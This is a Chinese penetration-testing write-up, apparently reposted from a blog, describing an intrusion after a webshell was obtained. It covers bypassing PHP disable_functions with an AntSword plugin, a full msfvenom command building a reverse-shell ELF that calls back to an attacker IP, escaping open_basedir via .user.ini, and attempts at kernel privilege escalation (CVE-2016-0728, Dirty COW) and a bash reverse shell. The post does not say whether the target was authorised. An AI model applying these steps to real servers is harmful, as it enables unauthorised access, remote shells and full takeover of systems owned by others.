disable_functions的绕过+目录突破+提权

  • A+
所属分类:安全文章

0x00


正常的操作拿到webshell,在虚拟终端里输入命令都没有反应


disable_functions的绕过+目录突破+提权


在phpinfo里找到disable_functions函数,发现很多命令都被禁用了。


disable_functions的绕过+目录突破+提权


0x01绕过disable_functions


在这里一开始使用了 LD_PRELOAD绕过,发现报错了。


disable_functions的绕过+目录突破+提权

然后使用蚁剑自带插件成功绕过。


disable_functions的绕过+目录突破+提权


然后到tmp目录查找看看,找到了.sock路径。


disable_functions的绕过+目录突破+提权

运行生成一个.antproxy.php文件。


disable_functions的绕过+目录突破+提权


然后连接.antproxy.php发现这个绕过只有一会的时间就会被断开,然后想着在上传木马到靶机,进行反弹shell。


disable_functions的绕过+目录突破+提权


0x02进行反弹shell


使用msf生成木马,我这里使用的是监听80端口,LHOST是你要接收shell反弹回来的IP,-i 表示编码的次数。

msfvenom -p linux/x64/shell_reverse_tcp -i 5 LHOST=x.x.x.x LPORT=80 -f elf -o /root/shell.elf


然后直接把.elf木马放到目标上,在突破disable_functions的时候会有几分钟的时间可以输入命令。在自己接收反弹shell的机器上开启80监听,然后直接运行木马进行反弹。


disable_functions的绕过+目录突破+提权


0x03目录突破


发现有些目录是浏览不了的。


disable_functions的绕过+目录突破+提权


在shell目录下新建.user.ini文件添加open_basedir=:/绕过php.ini的全局限制


disable_functions的绕过+目录突破+提权


可以访问了。


disable_functions的绕过+目录突破+提权


0x04提权


查看linux内核版本大于等于2.6.22,可以尝试CVE-2016-0728 提权(网上有很多相关的文章)


disable_functions的绕过+目录突破+提权


一开始编译出现错误,然后修改 PATH


disable_functions的绕过+目录突破+提权


运行之后半天不见出来东西。。。。


disable_functions的绕过+目录突破+提权


然后使用脏牛的时候问题跟上面一样。不懂是那里出错了。。


上面进行了目录的突破,然后我们可以使用bash反弹。

找到文件写入bash反弹语句


disable_functions的绕过+目录突破+提权


端口监听时候发现也是没有得到想要的。


disable_functions的绕过+目录突破+提权


emmmm,在这里卡了很久,然后人家说中间换了vps。

————————————————


作者:WII-FM,原文链接:https://blog.csdn.net/kong_free/article/details/106891179


disable_functions的绕过+目录突破+提权

干货|渗透学习资料大集合(书籍、工具、技术文档、视频教程)


disable_functions的绕过+目录突破+提权

点击上方,关注公众号

如文章对你有帮助,请支持点下“赞”“在看”

本文始发于微信公众号(HACK之道):disable_functions的绕过+目录突破+提权

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: